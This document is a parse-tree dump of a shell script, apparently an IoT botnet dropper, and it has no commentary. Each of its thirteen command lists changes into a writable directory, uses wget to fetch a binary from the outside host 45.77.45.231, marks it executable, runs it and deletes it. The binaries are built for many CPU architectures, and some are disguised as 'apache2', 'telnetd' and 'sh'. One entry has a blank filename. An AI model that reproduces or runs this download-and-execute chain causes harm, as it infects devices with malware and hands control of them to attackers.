ListNode(lineno=2, pos=(12, 156), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 102), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 102), word='http://45.77.45.231/marikomips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(102, 103)),
  CommandNode(lineno=2, pos=(104, 123), parts=[
    WordNode(lineno=2, pos=(104, 109), word='chmod'),
    WordNode(lineno=2, pos=(110, 112), word='+x'),
    WordNode(lineno=2, pos=(113, 123), word='marikomips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(123, 124)),
  CommandNode(lineno=2, pos=(125, 137), parts=[
    WordNode(lineno=2, pos=(125, 137), word='./marikomips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(137, 138)),
  CommandNode(lineno=2, pos=(139, 156), parts=[
    WordNode(lineno=2, pos=(139, 141), word='rm'),
    WordNode(lineno=2, pos=(142, 145), word='-rf'),
    WordNode(lineno=2, pos=(146, 156), word='marikomips'),
  ]),
])
ListNode(lineno=3, pos=(157, 309), parts=[
  CommandNode(lineno=3, pos=(157, 164), parts=[
    WordNode(lineno=3, pos=(157, 159), word='cd'),
    WordNode(lineno=3, pos=(160, 164), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(165, 167)),
  CommandNode(lineno=3, pos=(168, 179), parts=[
    WordNode(lineno=3, pos=(168, 170), word='cd'),
    WordNode(lineno=3, pos=(171, 179), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(180, 182)),
  CommandNode(lineno=3, pos=(183, 190), parts=[
    WordNode(lineno=3, pos=(183, 185), word='cd'),
    WordNode(lineno=3, pos=(186, 190), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(191, 193)),
  CommandNode(lineno=3, pos=(194, 202), parts=[
    WordNode(lineno=3, pos=(194, 196), word='cd'),
    WordNode(lineno=3, pos=(197, 202), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(203, 205)),
  CommandNode(lineno=3, pos=(206, 210), parts=[
    WordNode(lineno=3, pos=(206, 208), word='cd'),
    WordNode(lineno=3, pos=(209, 210), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(210, 211)),
  CommandNode(lineno=3, pos=(212, 249), parts=[
    WordNode(lineno=3, pos=(212, 216), word='wget'),
    WordNode(lineno=3, pos=(217, 249), word='http://45.77.45.231/marikomipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(249, 250)),
  CommandNode(lineno=3, pos=(251, 272), parts=[
    WordNode(lineno=3, pos=(251, 256), word='chmod'),
    WordNode(lineno=3, pos=(257, 259), word='+x'),
    WordNode(lineno=3, pos=(260, 272), word='marikomipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(272, 273)),
  CommandNode(lineno=3, pos=(274, 288), parts=[
    WordNode(lineno=3, pos=(274, 288), word='./marikomipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(288, 289)),
  CommandNode(lineno=3, pos=(290, 309), parts=[
    WordNode(lineno=3, pos=(290, 292), word='rm'),
    WordNode(lineno=3, pos=(293, 296), word='-rf'),
    WordNode(lineno=3, pos=(297, 309), word='marikomipsel'),
  ]),
])
ListNode(lineno=4, pos=(310, 450), parts=[
  CommandNode(lineno=4, pos=(310, 317), parts=[
    WordNode(lineno=4, pos=(310, 312), word='cd'),
    WordNode(lineno=4, pos=(313, 317), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(318, 320)),
  CommandNode(lineno=4, pos=(321, 332), parts=[
    WordNode(lineno=4, pos=(321, 323), word='cd'),
    WordNode(lineno=4, pos=(324, 332), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(333, 335)),
  CommandNode(lineno=4, pos=(336, 343), parts=[
    WordNode(lineno=4, pos=(336, 338), word='cd'),
    WordNode(lineno=4, pos=(339, 343), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(344, 346)),
  CommandNode(lineno=4, pos=(347, 355), parts=[
    WordNode(lineno=4, pos=(347, 349), word='cd'),
    WordNode(lineno=4, pos=(350, 355), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(356, 358)),
  CommandNode(lineno=4, pos=(359, 363), parts=[
    WordNode(lineno=4, pos=(359, 361), word='cd'),
    WordNode(lineno=4, pos=(362, 363), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(363, 364)),
  CommandNode(lineno=4, pos=(365, 399), parts=[
    WordNode(lineno=4, pos=(365, 369), word='wget'),
    WordNode(lineno=4, pos=(370, 399), word='http://45.77.45.231/marikosh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(399, 400)),
  CommandNode(lineno=4, pos=(401, 419), parts=[
    WordNode(lineno=4, pos=(401, 406), word='chmod'),
    WordNode(lineno=4, pos=(407, 409), word='+x'),
    WordNode(lineno=4, pos=(410, 419), word='marikosh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(419, 420)),
  CommandNode(lineno=4, pos=(421, 432), parts=[
    WordNode(lineno=4, pos=(421, 432), word='./marikosh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(432, 433)),
  CommandNode(lineno=4, pos=(434, 450), parts=[
    WordNode(lineno=4, pos=(434, 436), word='rm'),
    WordNode(lineno=4, pos=(437, 440), word='-rf'),
    WordNode(lineno=4, pos=(441, 450), word='marikosh4'),
  ]),
])
ListNode(lineno=5, pos=(451, 591), parts=[
  CommandNode(lineno=5, pos=(451, 458), parts=[
    WordNode(lineno=5, pos=(451, 453), word='cd'),
    WordNode(lineno=5, pos=(454, 458), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(459, 461)),
  CommandNode(lineno=5, pos=(462, 473), parts=[
    WordNode(lineno=5, pos=(462, 464), word='cd'),
    WordNode(lineno=5, pos=(465, 473), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(474, 476)),
  CommandNode(lineno=5, pos=(477, 484), parts=[
    WordNode(lineno=5, pos=(477, 479), word='cd'),
    WordNode(lineno=5, pos=(480, 484), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(485, 487)),
  CommandNode(lineno=5, pos=(488, 496), parts=[
    WordNode(lineno=5, pos=(488, 490), word='cd'),
    WordNode(lineno=5, pos=(491, 496), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(497, 499)),
  CommandNode(lineno=5, pos=(500, 504), parts=[
    WordNode(lineno=5, pos=(500, 502), word='cd'),
    WordNode(lineno=5, pos=(503, 504), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(504, 505)),
  CommandNode(lineno=5, pos=(506, 540), parts=[
    WordNode(lineno=5, pos=(506, 510), word='wget'),
    WordNode(lineno=5, pos=(511, 540), word='http://45.77.45.231/marikox86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(540, 541)),
  CommandNode(lineno=5, pos=(542, 560), parts=[
    WordNode(lineno=5, pos=(542, 547), word='chmod'),
    WordNode(lineno=5, pos=(548, 550), word='+x'),
    WordNode(lineno=5, pos=(551, 560), word='marikox86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(560, 561)),
  CommandNode(lineno=5, pos=(562, 573), parts=[
    WordNode(lineno=5, pos=(562, 573), word='./marikox86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(573, 574)),
  CommandNode(lineno=5, pos=(575, 591), parts=[
    WordNode(lineno=5, pos=(575, 577), word='rm'),
    WordNode(lineno=5, pos=(578, 581), word='-rf'),
    WordNode(lineno=5, pos=(582, 591), word='marikox86'),
  ]),
])
ListNode(lineno=6, pos=(592, 744), parts=[
  CommandNode(lineno=6, pos=(592, 599), parts=[
    WordNode(lineno=6, pos=(592, 594), word='cd'),
    WordNode(lineno=6, pos=(595, 599), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(600, 602)),
  CommandNode(lineno=6, pos=(603, 614), parts=[
    WordNode(lineno=6, pos=(603, 605), word='cd'),
    WordNode(lineno=6, pos=(606, 614), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(615, 617)),
  CommandNode(lineno=6, pos=(618, 625), parts=[
    WordNode(lineno=6, pos=(618, 620), word='cd'),
    WordNode(lineno=6, pos=(621, 625), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(626, 628)),
  CommandNode(lineno=6, pos=(629, 637), parts=[
    WordNode(lineno=6, pos=(629, 631), word='cd'),
    WordNode(lineno=6, pos=(632, 637), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(638, 640)),
  CommandNode(lineno=6, pos=(641, 645), parts=[
    WordNode(lineno=6, pos=(641, 643), word='cd'),
    WordNode(lineno=6, pos=(644, 645), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(645, 646)),
  CommandNode(lineno=6, pos=(647, 684), parts=[
    WordNode(lineno=6, pos=(647, 651), word='wget'),
    WordNode(lineno=6, pos=(652, 684), word='http://45.77.45.231/marikoarmv6l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(684, 685)),
  CommandNode(lineno=6, pos=(686, 707), parts=[
    WordNode(lineno=6, pos=(686, 691), word='chmod'),
    WordNode(lineno=6, pos=(692, 694), word='+x'),
    WordNode(lineno=6, pos=(695, 707), word='marikoarmv6l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(707, 708)),
  CommandNode(lineno=6, pos=(709, 723), parts=[
    WordNode(lineno=6, pos=(709, 723), word='./marikoarmv6l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(723, 724)),
  CommandNode(lineno=6, pos=(725, 744), parts=[
    WordNode(lineno=6, pos=(725, 727), word='rm'),
    WordNode(lineno=6, pos=(728, 731), word='-rf'),
    WordNode(lineno=6, pos=(732, 744), word='marikoarmv6l'),
  ]),
])
ListNode(lineno=7, pos=(745, 889), parts=[
  CommandNode(lineno=7, pos=(745, 752), parts=[
    WordNode(lineno=7, pos=(745, 747), word='cd'),
    WordNode(lineno=7, pos=(748, 752), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(753, 755)),
  CommandNode(lineno=7, pos=(756, 767), parts=[
    WordNode(lineno=7, pos=(756, 758), word='cd'),
    WordNode(lineno=7, pos=(759, 767), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(768, 770)),
  CommandNode(lineno=7, pos=(771, 778), parts=[
    WordNode(lineno=7, pos=(771, 773), word='cd'),
    WordNode(lineno=7, pos=(774, 778), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(779, 781)),
  CommandNode(lineno=7, pos=(782, 790), parts=[
    WordNode(lineno=7, pos=(782, 784), word='cd'),
    WordNode(lineno=7, pos=(785, 790), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(791, 793)),
  CommandNode(lineno=7, pos=(794, 798), parts=[
    WordNode(lineno=7, pos=(794, 796), word='cd'),
    WordNode(lineno=7, pos=(797, 798), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(798, 799)),
  CommandNode(lineno=7, pos=(800, 835), parts=[
    WordNode(lineno=7, pos=(800, 804), word='wget'),
    WordNode(lineno=7, pos=(805, 835), word='http://45.77.45.231/marikoi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(835, 836)),
  CommandNode(lineno=7, pos=(837, 856), parts=[
    WordNode(lineno=7, pos=(837, 842), word='chmod'),
    WordNode(lineno=7, pos=(843, 845), word='+x'),
    WordNode(lineno=7, pos=(846, 856), word='marikoi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(856, 857)),
  CommandNode(lineno=7, pos=(858, 870), parts=[
    WordNode(lineno=7, pos=(858, 870), word='./marikoi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(870, 871)),
  CommandNode(lineno=7, pos=(872, 889), parts=[
    WordNode(lineno=7, pos=(872, 874), word='rm'),
    WordNode(lineno=7, pos=(875, 878), word='-rf'),
    WordNode(lineno=7, pos=(879, 889), word='marikoi686'),
  ]),
])
ListNode(lineno=8, pos=(890, 1030), parts=[
  CommandNode(lineno=8, pos=(890, 897), parts=[
    WordNode(lineno=8, pos=(890, 892), word='cd'),
    WordNode(lineno=8, pos=(893, 897), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(898, 900)),
  CommandNode(lineno=8, pos=(901, 912), parts=[
    WordNode(lineno=8, pos=(901, 903), word='cd'),
    WordNode(lineno=8, pos=(904, 912), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(913, 915)),
  CommandNode(lineno=8, pos=(916, 923), parts=[
    WordNode(lineno=8, pos=(916, 918), word='cd'),
    WordNode(lineno=8, pos=(919, 923), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(924, 926)),
  CommandNode(lineno=8, pos=(927, 935), parts=[
    WordNode(lineno=8, pos=(927, 929), word='cd'),
    WordNode(lineno=8, pos=(930, 935), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(936, 938)),
  CommandNode(lineno=8, pos=(939, 943), parts=[
    WordNode(lineno=8, pos=(939, 941), word='cd'),
    WordNode(lineno=8, pos=(942, 943), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(943, 944)),
  CommandNode(lineno=8, pos=(945, 979), parts=[
    WordNode(lineno=8, pos=(945, 949), word='wget'),
    WordNode(lineno=8, pos=(950, 979), word='http://45.77.45.231/marikoppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(979, 980)),
  CommandNode(lineno=8, pos=(981, 999), parts=[
    WordNode(lineno=8, pos=(981, 986), word='chmod'),
    WordNode(lineno=8, pos=(987, 989), word='+x'),
    WordNode(lineno=8, pos=(990, 999), word='marikoppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(999, 1000)),
  CommandNode(lineno=8, pos=(1001, 1012), parts=[
    WordNode(lineno=8, pos=(1001, 1012), word='./marikoppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1012, 1013)),
  CommandNode(lineno=8, pos=(1014, 1030), parts=[
    WordNode(lineno=8, pos=(1014, 1016), word='rm'),
    WordNode(lineno=8, pos=(1017, 1020), word='-rf'),
    WordNode(lineno=8, pos=(1021, 1030), word='marikoppc'),
  ]),
])
ListNode(lineno=9, pos=(1031, 1175), parts=[
  CommandNode(lineno=9, pos=(1031, 1038), parts=[
    WordNode(lineno=9, pos=(1031, 1033), word='cd'),
    WordNode(lineno=9, pos=(1034, 1038), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1039, 1041)),
  CommandNode(lineno=9, pos=(1042, 1053), parts=[
    WordNode(lineno=9, pos=(1042, 1044), word='cd'),
    WordNode(lineno=9, pos=(1045, 1053), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1054, 1056)),
  CommandNode(lineno=9, pos=(1057, 1064), parts=[
    WordNode(lineno=9, pos=(1057, 1059), word='cd'),
    WordNode(lineno=9, pos=(1060, 1064), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1065, 1067)),
  CommandNode(lineno=9, pos=(1068, 1076), parts=[
    WordNode(lineno=9, pos=(1068, 1070), word='cd'),
    WordNode(lineno=9, pos=(1071, 1076), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1077, 1079)),
  CommandNode(lineno=9, pos=(1080, 1084), parts=[
    WordNode(lineno=9, pos=(1080, 1082), word='cd'),
    WordNode(lineno=9, pos=(1083, 1084), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1084, 1085)),
  CommandNode(lineno=9, pos=(1086, 1121), parts=[
    WordNode(lineno=9, pos=(1086, 1090), word='wget'),
    WordNode(lineno=9, pos=(1091, 1121), word='http://45.77.45.231/marikoi586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1121, 1122)),
  CommandNode(lineno=9, pos=(1123, 1142), parts=[
    WordNode(lineno=9, pos=(1123, 1128), word='chmod'),
    WordNode(lineno=9, pos=(1129, 1131), word='+x'),
    WordNode(lineno=9, pos=(1132, 1142), word='marikoi586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1142, 1143)),
  CommandNode(lineno=9, pos=(1144, 1156), parts=[
    WordNode(lineno=9, pos=(1144, 1156), word='./marikoi586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1156, 1157)),
  CommandNode(lineno=9, pos=(1158, 1175), parts=[
    WordNode(lineno=9, pos=(1158, 1160), word='rm'),
    WordNode(lineno=9, pos=(1161, 1164), word='-rf'),
    WordNode(lineno=9, pos=(1165, 1175), word='marikoi586'),
  ]),
])
ListNode(lineno=10, pos=(1176, 1320), parts=[
  CommandNode(lineno=10, pos=(1176, 1183), parts=[
    WordNode(lineno=10, pos=(1176, 1178), word='cd'),
    WordNode(lineno=10, pos=(1179, 1183), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1184, 1186)),
  CommandNode(lineno=10, pos=(1187, 1198), parts=[
    WordNode(lineno=10, pos=(1187, 1189), word='cd'),
    WordNode(lineno=10, pos=(1190, 1198), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1199, 1201)),
  CommandNode(lineno=10, pos=(1202, 1209), parts=[
    WordNode(lineno=10, pos=(1202, 1204), word='cd'),
    WordNode(lineno=10, pos=(1205, 1209), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1210, 1212)),
  CommandNode(lineno=10, pos=(1213, 1221), parts=[
    WordNode(lineno=10, pos=(1213, 1215), word='cd'),
    WordNode(lineno=10, pos=(1216, 1221), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1222, 1224)),
  CommandNode(lineno=10, pos=(1225, 1229), parts=[
    WordNode(lineno=10, pos=(1225, 1227), word='cd'),
    WordNode(lineno=10, pos=(1228, 1229), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1229, 1230)),
  CommandNode(lineno=10, pos=(1231, 1266), parts=[
    WordNode(lineno=10, pos=(1231, 1235), word='wget'),
    WordNode(lineno=10, pos=(1236, 1266), word='http://45.77.45.231/marikom68l'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1266, 1267)),
  CommandNode(lineno=10, pos=(1268, 1287), parts=[
    WordNode(lineno=10, pos=(1268, 1273), word='chmod'),
    WordNode(lineno=10, pos=(1274, 1276), word='+x'),
    WordNode(lineno=10, pos=(1277, 1287), word='marikom68l'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1287, 1288)),
  CommandNode(lineno=10, pos=(1289, 1301), parts=[
    WordNode(lineno=10, pos=(1289, 1301), word='./marikom68l'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1301, 1302)),
  CommandNode(lineno=10, pos=(1303, 1320), parts=[
    WordNode(lineno=10, pos=(1303, 1305), word='rm'),
    WordNode(lineno=10, pos=(1306, 1309), word='-rf'),
    WordNode(lineno=10, pos=(1310, 1320), word='marikom68l'),
  ]),
])
ListNode(lineno=11, pos=(1321, 1433), parts=[
  CommandNode(lineno=11, pos=(1321, 1328), parts=[
    WordNode(lineno=11, pos=(1321, 1323), word='cd'),
    WordNode(lineno=11, pos=(1324, 1328), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1329, 1331)),
  CommandNode(lineno=11, pos=(1332, 1343), parts=[
    WordNode(lineno=11, pos=(1332, 1334), word='cd'),
    WordNode(lineno=11, pos=(1335, 1343), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1344, 1346)),
  CommandNode(lineno=11, pos=(1347, 1354), parts=[
    WordNode(lineno=11, pos=(1347, 1349), word='cd'),
    WordNode(lineno=11, pos=(1350, 1354), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1355, 1357)),
  CommandNode(lineno=11, pos=(1358, 1366), parts=[
    WordNode(lineno=11, pos=(1358, 1360), word='cd'),
    WordNode(lineno=11, pos=(1361, 1366), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1367, 1369)),
  CommandNode(lineno=11, pos=(1370, 1374), parts=[
    WordNode(lineno=11, pos=(1370, 1372), word='cd'),
    WordNode(lineno=11, pos=(1373, 1374), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1374, 1375)),
  CommandNode(lineno=11, pos=(1376, 1403), parts=[
    WordNode(lineno=11, pos=(1376, 1380), word='wget'),
    WordNode(lineno=11, pos=(1381, 1403), word='http://45.77.45.231/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1403, 1404)),
  CommandNode(lineno=11, pos=(1405, 1416), parts=[
    WordNode(lineno=11, pos=(1405, 1410), word='chmod'),
    WordNode(lineno=11, pos=(1411, 1413), word='+x'),
    WordNode(lineno=11, pos=(1414, 1416), word='sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1416, 1417)),
  CommandNode(lineno=11, pos=(1418, 1422), parts=[
    WordNode(lineno=11, pos=(1418, 1422), word='./sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1422, 1423)),
  CommandNode(lineno=11, pos=(1424, 1433), parts=[
    WordNode(lineno=11, pos=(1424, 1426), word='rm'),
    WordNode(lineno=11, pos=(1427, 1430), word='-rf'),
    WordNode(lineno=11, pos=(1431, 1433), word='sh'),
  ]),
])
ListNode(lineno=12, pos=(1434, 1550), parts=[
  CommandNode(lineno=12, pos=(1434, 1441), parts=[
    WordNode(lineno=12, pos=(1434, 1436), word='cd'),
    WordNode(lineno=12, pos=(1437, 1441), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1442, 1444)),
  CommandNode(lineno=12, pos=(1445, 1456), parts=[
    WordNode(lineno=12, pos=(1445, 1447), word='cd'),
    WordNode(lineno=12, pos=(1448, 1456), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1457, 1459)),
  CommandNode(lineno=12, pos=(1460, 1467), parts=[
    WordNode(lineno=12, pos=(1460, 1462), word='cd'),
    WordNode(lineno=12, pos=(1463, 1467), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1468, 1470)),
  CommandNode(lineno=12, pos=(1471, 1479), parts=[
    WordNode(lineno=12, pos=(1471, 1473), word='cd'),
    WordNode(lineno=12, pos=(1474, 1479), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1480, 1482)),
  CommandNode(lineno=12, pos=(1483, 1487), parts=[
    WordNode(lineno=12, pos=(1483, 1485), word='cd'),
    WordNode(lineno=12, pos=(1486, 1487), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1487, 1488)),
  CommandNode(lineno=12, pos=(1489, 1517), parts=[
    WordNode(lineno=12, pos=(1489, 1493), word='wget'),
    WordNode(lineno=12, pos=(1494, 1517), word='http://45.77.45.231/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1517, 1518)),
  CommandNode(lineno=12, pos=(1519, 1531), parts=[
    WordNode(lineno=12, pos=(1519, 1524), word='chmod'),
    WordNode(lineno=12, pos=(1525, 1527), word='+x'),
    WordNode(lineno=12, pos=(1528, 1531), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1531, 1532)),
  CommandNode(lineno=12, pos=(1533, 1538), parts=[
    WordNode(lineno=12, pos=(1533, 1538), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1538, 1539)),
  CommandNode(lineno=12, pos=(1540, 1550), parts=[
    WordNode(lineno=12, pos=(1540, 1542), word='rm'),
    WordNode(lineno=12, pos=(1543, 1546), word='-rf'),
    WordNode(lineno=12, pos=(1547, 1550), word=' '),
  ]),
])
ListNode(lineno=13, pos=(1551, 1683), parts=[
  CommandNode(lineno=13, pos=(1551, 1558), parts=[
    WordNode(lineno=13, pos=(1551, 1553), word='cd'),
    WordNode(lineno=13, pos=(1554, 1558), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1559, 1561)),
  CommandNode(lineno=13, pos=(1562, 1573), parts=[
    WordNode(lineno=13, pos=(1562, 1564), word='cd'),
    WordNode(lineno=13, pos=(1565, 1573), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1574, 1576)),
  CommandNode(lineno=13, pos=(1577, 1584), parts=[
    WordNode(lineno=13, pos=(1577, 1579), word='cd'),
    WordNode(lineno=13, pos=(1580, 1584), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1585, 1587)),
  CommandNode(lineno=13, pos=(1588, 1596), parts=[
    WordNode(lineno=13, pos=(1588, 1590), word='cd'),
    WordNode(lineno=13, pos=(1591, 1596), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1597, 1599)),
  CommandNode(lineno=13, pos=(1600, 1604), parts=[
    WordNode(lineno=13, pos=(1600, 1602), word='cd'),
    WordNode(lineno=13, pos=(1603, 1604), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1604, 1605)),
  CommandNode(lineno=13, pos=(1606, 1638), parts=[
    WordNode(lineno=13, pos=(1606, 1610), word='wget'),
    WordNode(lineno=13, pos=(1611, 1638), word='http://45.77.45.231/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1638, 1639)),
  CommandNode(lineno=13, pos=(1640, 1656), parts=[
    WordNode(lineno=13, pos=(1640, 1645), word='chmod'),
    WordNode(lineno=13, pos=(1646, 1648), word='+x'),
    WordNode(lineno=13, pos=(1649, 1656), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1656, 1657)),
  CommandNode(lineno=13, pos=(1658, 1667), parts=[
    WordNode(lineno=13, pos=(1658, 1667), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1667, 1668)),
  CommandNode(lineno=13, pos=(1669, 1683), parts=[
    WordNode(lineno=13, pos=(1669, 1671), word='rm'),
    WordNode(lineno=13, pos=(1672, 1675), word='-rf'),
    WordNode(lineno=13, pos=(1676, 1683), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(1684, 1816), parts=[
  CommandNode(lineno=14, pos=(1684, 1691), parts=[
    WordNode(lineno=14, pos=(1684, 1686), word='cd'),
    WordNode(lineno=14, pos=(1687, 1691), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1692, 1694)),
  CommandNode(lineno=14, pos=(1695, 1706), parts=[
    WordNode(lineno=14, pos=(1695, 1697), word='cd'),
    WordNode(lineno=14, pos=(1698, 1706), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1707, 1709)),
  CommandNode(lineno=14, pos=(1710, 1717), parts=[
    WordNode(lineno=14, pos=(1710, 1712), word='cd'),
    WordNode(lineno=14, pos=(1713, 1717), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1718, 1720)),
  CommandNode(lineno=14, pos=(1721, 1729), parts=[
    WordNode(lineno=14, pos=(1721, 1723), word='cd'),
    WordNode(lineno=14, pos=(1724, 1729), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1730, 1732)),
  CommandNode(lineno=14, pos=(1733, 1737), parts=[
    WordNode(lineno=14, pos=(1733, 1735), word='cd'),
    WordNode(lineno=14, pos=(1736, 1737), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1737, 1738)),
  CommandNode(lineno=14, pos=(1739, 1771), parts=[
    WordNode(lineno=14, pos=(1739, 1743), word='wget'),
    WordNode(lineno=14, pos=(1744, 1771), word='http://45.77.45.231/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1771, 1772)),
  CommandNode(lineno=14, pos=(1773, 1789), parts=[
    WordNode(lineno=14, pos=(1773, 1778), word='chmod'),
    WordNode(lineno=14, pos=(1779, 1781), word='+x'),
    WordNode(lineno=14, pos=(1782, 1789), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1789, 1790)),
  CommandNode(lineno=14, pos=(1791, 1800), parts=[
    WordNode(lineno=14, pos=(1791, 1800), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1800, 1801)),
  CommandNode(lineno=14, pos=(1802, 1816), parts=[
    WordNode(lineno=14, pos=(1802, 1804), word='rm'),
    WordNode(lineno=14, pos=(1805, 1808), word='-rf'),
    WordNode(lineno=14, pos=(1809, 1816), word='telnetd'),
  ]),
])
